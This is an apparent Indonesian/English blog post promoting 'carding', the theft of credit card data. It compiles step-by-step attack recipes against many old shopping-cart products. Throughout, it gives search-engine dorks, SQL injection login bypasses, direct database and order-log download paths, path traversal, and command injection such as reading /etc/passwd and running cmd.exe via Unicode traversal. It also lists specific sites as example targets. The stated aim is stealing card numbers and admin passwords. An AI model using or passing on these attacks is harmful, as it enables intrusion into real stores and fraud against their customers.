Monday, 11 November 2013

Carding? Mari Kita Lakukan

Note  : - dalam tulisan ini kita coba lakukan 2 metode.
        - metode pertama masuk melalui halaman shopadmin.asp dengan metode SQL injection.
        - metode kedua dengan cara mencari database file *.mdb dari file shopdbtest.asp
Metode Pertama :
---------------
1. mulai cari target situs dengan VP-ASP shopping Cart.
   search in all search engine --> google, altavista, yahoo and etc.
                 contoh  : allinurl:vp-asp    or    allinurl:shopadmin.asp 
2. contoh kita dapat situs dengan vp-asp cart ---> www.target.com.
   rumus manualnya seperti :
           www.target.com/vp-asp dir/shopadmin.asp   atau   www.target.com/shopadmin.asp
   note : tergantung dimana situs tersebut meletakan file shopadmin.asp
3. setelah berhasil mendapatkan url shopadmin.asp lalu kita inject SQL nya.
   masukan login dan password injection nya.
   contoh  : 
              www.target.com/vp-asp dir/shopadmin.asp
              login  : 'or''='        atau      login   : admin
              passwd : 'or''='                  passwd  : 'or''='
4. OK. kalo berhasil masuk kita akan melihat isi dari database admin.
   seperti :
             - Display Orders
             - Display Producs
             - Edit Orders
             - dan lain-lain.
Metode kedua :
--------------
1. ketika injection falied maka kita coba download database nya :P~
2. rumus manualnya dengan shopdbtest.asp.
   contoh :
             www.target.com/vp-asp dir/shopdbtest.asp   atau   www.target.com/shopdbtest.asp
    note : tergantung dimana situs tersebut meletakan file shopdbtest.asp
3. Jika beruntung kita akan mendapatkan informasi tentang database si admin :)
   database berisi :
     - xDatabase
     - xDblocation
     - xdatabasetype
     - xEmail
     - xEmailName
     - xEmailSubject
     - xEmailSystem
     - xEmailType
     - xOrdernumber
4. selanjutnya kita liat file dengan ex *.mdb berada.
   caranya :    
     - xDatabase    ---> untuk nama file *.mdb nya.
     - xDblocation  ---> untuk lokasi file *.mdb nya.
    contoh :
     - xDatabase   = shopping200
     - xDblocation = shop
    display :
              www.target.com/shop/shoping200.mdb
5. setalah itu file shoping200.mdb secara automatis akan terdownload :)
   untuk melihat isi database shoping200.mdb kamu bisa membukanya dengan Ms Access.
6. Ok Thank's selamat mencoba....
Contoh target :
http://www.bossant.com.cn/shop/shopping.mdb
http://www.youngsliquors.com/winestore/shopping300.mdb
http://www.jinhuaham.com/newshop/shopping.mdb
http://www.vienna-plan.at/shopa/shopping.mdb
http://www.crystalacarte.com/shopdbtest.asp
http://www.mediablend.com/demos/ecommerce/mbstore/store/shopdbtest.asp
http://www.armoredplanet.com/vpshop/shopdbtest.asp
http://www.adventureropes.com/Shopping/shopdbtest.asp
http://www.4urbike.com/shopdbtest.asp
http://www.bottegadelleapi.com/SHOP/shopdbtest.asp
http://www.decathlon.com.tw/demo/shopdbtest.asp
  NEXT   -----> Search Again !!!!
 
Note : this is Storefront sql injection tested on 6.0 and older versions.
Begin :
  - Search in your search engine a website that has storefront Shopping Cart.
  - coz this is sql injection from login page so search code like :
    e.g :  allinurl:StoreFront+login+page    or another combination :)
(1) found A Target like this:
    http://www.target.com/login.asp  or http://www.target.com/storedir/login.asp  
(2) to have then access to the first user in database structure.
    If an attacker knew any email address of a registered user, 
    it'll be possible for him to retrieve the registered uses's information from this login page.
(3) and now example for injection to login.asp
    e.g :  http://www.target.com/login.asp
           login  : example@example.com  --> or u have a registered email id in that site.
           passwd : ' or 'a'='a
 
The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
Because of its flexibility, it allows you to sell virtually any product or services and
fully customize the shopping experience of your web site.
Owner :
http://www.ksofttech.com/help/shopplus/
Problem:
Script doesnt check symbols. any user can execute commands on webserver.
Exploit:
http://target.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
http://target.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
Thank's
 
Bugs File   : admin page --> /admin
Display     : http://target.com/s-cart/admin
1. search in all search engine e.g --> allinurl:s-cart/index.phtml  or "s-cart" 
2. Get the target site like --> http://www.target.com/s-cart/index.phtml
3. and now go to admin page with change the Url to : 
   http://www.target.com/s-cart/admin   -->  auto open browser with login and passwd !!!
   login  : admin
   passwd : 'or''='
4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.
   Ok let's to try :P~
 
caranya :         
1. kamu bisa saja mencoba dengan mengetikan "PDG_Cart" pada search engine.   
   setelah dapat situs yang memakai PDG_Cart.
   CONTOH:
   www.target.com/cgi-bin/PDG_Cart
2. lalu loe ketik aja bugsnya untuk mendapatkan login dan password MERCHANT 
   seperti :
   -order.log
   -shopper.conf     
   -Auth.log 
   -Auth_Admin.log
   -authorizenet.log
   -dll.   
contoh : www.target.com/cgi-bin/PDG_Cart/shopper.conf
 
MIDICART is s an ASP and PHP based shopping Cart application with MS Access and SQL database.
A security vulnerability in the product allows remote attackers to download the product's
database, thus gain access to sensitive information about users of the product
(name, surname, address, e-mail, phone number, credit card number, and company name).
Example:
Accessing the following URL will return the database used by the product:
http://www.target.com/shoppingdirectory/midicart.mdb
e.g :
http://www.cc200.com/branches/pes/midicart/shop/midicart.mdb
So Download Now !!!
Thank's
 
caranya :   kamu cari di semua search engine      
1. kamu bisa saja mencoba dengan mengetikan "mall2000.cgi" pada 
   search engine.  atau melihatnya dari http://www.ezmall2000.com/ 
   setelah dapat situs yang memakai mall2000.cgi  
   CONTOH:
   http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?
2. nah langkah kedua loe ketik aja " &page=../ "
   kayak gituh seperti ini.
   contoh : 
   http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?&page=../
3. lalu loe ketik aja bugsnya untuk mendapatkan list data ato 
   Credit Card hasil dari transaksi di situs tersebut.
   seperti :
   -order.log
   -error.log
   -access.log
   -dll.  
   contoh : 
   http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?&page=../order.log
4. setelah dapet jangan teriak keras2 nanti ketahuan sama temen-temen elo
   saran gua loe sering sering mencoba ajah OK.
5. baca tutorial yang shopping cart lain juga.
6. THANK"S
 
Bugs File   : /forumcgi/display.cgi?
Display     : http://www.target.com/encore/forumcgi/display.cgi?
1. search in all search engine e.g --> allinurl:forumcgi/display.cgi?
2. Get the target site like --> http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp
3. and now go to the exploit with insert this code : 
                        &page=anonymous&file=|uname%20-a|
4. Full Display like :
   http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a|
5. Linux or Unix command available in here...  Good Luck :P~
 
Sebelum mencari bugs pada DCShop
Loe harus tarik napas dolo panjang panjang ok.Nah begini caranyah :
1. Buka search engine (www.altavista.com atau www.google.com)   
2. Masukkan keyword nya 'url:DCShop' 
   maka search engine tersebut akan mencari semua links 
   yang mempunyai links yang ada DCShop nya.  
3. Misalkan loe dapet url nyah :
   http://theTargetHost/cgi-bin/DCShop/
4. maka untuk mendapatkan list CC dan daftar belanja dari site tersebut 
   loe tinggal tambahin aja di belakangnya : 
   "Orders/orders.txt"
   lengkapnya menjadi :
   http://theTargetHost/cgi-bin/DCShop/Orders/orders.txt
5. selanjutnya loe dapet juga mencari daftar nama administrator
   dan passwordnya dengan menambahkan keyword :
   "Auth_data/auth_user_file.txt"
   lengkapnya menjadi :
   http://theTargetHost/cgi-bin/DCShop/Auth_data/auth_user_file.txt
6. OK ini dulu yah.... selamat mencoba.............
 
I am Just a KID.
I just want to know about this shopping Cart. 
CommerceSQL shopping cart use PERL script for Proccesing Data or Order.
you can see more information about commerceSQL shopping Cart in 
http://commercesql.com.
I have knew the full path from / the base directory or the path of 
files 
starting the folder in which index.cgi resides.
 
 
 
Begin :
Search in your search engine a website that has CommerceSQL Shopping 
Cart.
(1) found A Target like this:
    http://www.target.com/cgi-bin/commerceSQL/index.cgi
    Anyway what useful files I've found so far are :  ?page=../index.cgi
    example:
    http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../index.cgi
(2) this is the file where you will find the paths to the shop admin 
    files: 
         ?page=../admin/manager.cgi 
         example :
         http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/manager.cgi
(3) this is the file where you will find the paths to the admin configuration file,
    and this is where you'll find the database file name, username and 
    password to access it :
    ?page=../admin/admin_conf.pl 
     or
    ?page=../admin/configuration.pl
    ?page=../admin/admin_conf.pl
    ?page=../admin/html_lib.pl
    example :
    http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/admin_conf.pl
(4) this is the file where you will find the paths to the Order log :
    ?page=../admin/files/order.log
    example :
    http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/files/order.log
(5) Good Luck !!! and sorry my english is bad :P
 
Recently there are many hacking attempts attacking E-commerce site
that use CCBILL to precess credit cards. Some of my clients sites are
hacked and defaced by this vulnerability. In the Incidents List,
some people already mention about it. I just take a look at the 
actual problem and figure out that the vulnerability is at the whereami.cgi
in the /ccbill/ directory. That script allow attackers to run commands
without authorization.
Example :
http://victimhost/ccbill/whereami.cgi?g=cat%20../../../../etc/password
Thank's
 
NB :  Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan 
                yang sama.
Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a
Langkah 2: Cari di semua searc engine yang kamu ketahui.
                 dengan keyword " Cart32 v3.5a  "
Langkah 3: Masuk ke website Cart32.exe 
                 http://target/login/unicode/cart32.exe           
                 (contoh : http://www.connectionsmall.com/scripts/cart32.exe/)
Langkah 4: Setelah kamu masuk kesana, akan diperlihatkan tampilan 
      seperti dibawah ini :
Cart32 v3.5a
Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi 
    berikut di akhir URL, 98% memakai #1 & #2    
     a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
     b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)
     c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\)  
 HANYA DIGUNAKAN KADANG2!
(contoh:http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
Langkah 5: Saat kamu berada di direktori utama (c:\), untuk masuk ke 
    cc's, masukan kembali (\progra~1\MWAInc\Cart32\) ke akhir URL tadi 
    sehingga sekarang kamu dapat melihat seperti : 
 http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
    Sekarang kamu dapat melihat banyak file seperti :         
          2814659000-001001.c32
          2814659000-001002.c32         
          2814659000-001003.c32
Langkah 6:   Copy salah satu dari nama file tersebut dan kemudian 
    masukkan ke akhir URL, dan akan terlihat  seperti :  http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\2814659000-001003.c32
    Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali 
    cc's seperti :
                   RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)
                   procure-orders.txt (file ini tidak berada pada situs yang khusus ini)
Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti             
      *c+dir+c:\* ke *c+type+c:\*
 
TUTORIAL II  : Cart32 v3.5a 
Target: http://www.partybows.com
1. Ke http://www.partybows.com
2. Klik http://www.partybows.com/seasonal.htm
3. Isi Quantity= 1   Pokoknya kayak lu pura2x beli dan klik order
4. Maka akan kesini jadinya :    
    https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem
5. Ubah menjadi    
    https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error
      Cart32 v3.5 Error      
              CART32 Build 619
      The following internal error has occurred: Invalid procedure 
                Error Number = 5      
                Click Here For Possible Solutions      
               etc.
6. Cari log order-nya      
         Cart32 Setup Info and Directory
 Mail Server = mail.axion.net Section=Main
 AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\
 Jadi partybows-orders.txt. 
               Sehingga akhirnya : 
               http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt
7. Atau untuk mendapatkan Password admin nyah loe tinggak ketik cart32.ini
              https://secure.axionet.com/partybows/cgi-bin/cart32.ini
              dengan tidak di sengaja kamu akan mendownload Password admin
              yang ada di file cart32.ini nyah.
              kamu akan mendapat kan password admin yang terencriptsi
              lalu kamu coba mendecriptkan nyah dengan software
              " Cart32decoder.exe "
8. Untuk mendapatkan data nama dan password clients pada Cart32 
              kamu bisa mencobanya dengan mengetik "CLIENT.DBF"
              atau :
              order file pada "ORDER atau ORDERS.DBF
 
TUTORIAL III : Cart32 v3.5a
search +/scripts/cart32.exe/ 
Exploitable Directories
-/scripts/cart32.ini
-/scripts/cart32.exe 
-/scripts/cart32.exe/cart32clientlist
-/script/c32web.exe/ChangeAdminPassword  
-/scripts/c32web.exe
-cgi-shl/c32web.exe/ 
Wherever there is the cart32.exe add this to the end of it /cart32clientlist 
and erase the rest a menu will come up with a submit box click go 
it will list ALL clients and their passwords passwords will be encrypted 
after decrypting the password, go to wherever the [c32web.exe] file is 
thats the instructions wit exploits what that channel we were just in called


1 comments:

Unknown said...

Pusing bang :v

Post a Comment

◄ Newer Post Older Post ►
 

Copyright 2012 Ivan Andhika Muslim Seo Elite by BLog Ivan | Blogger Templates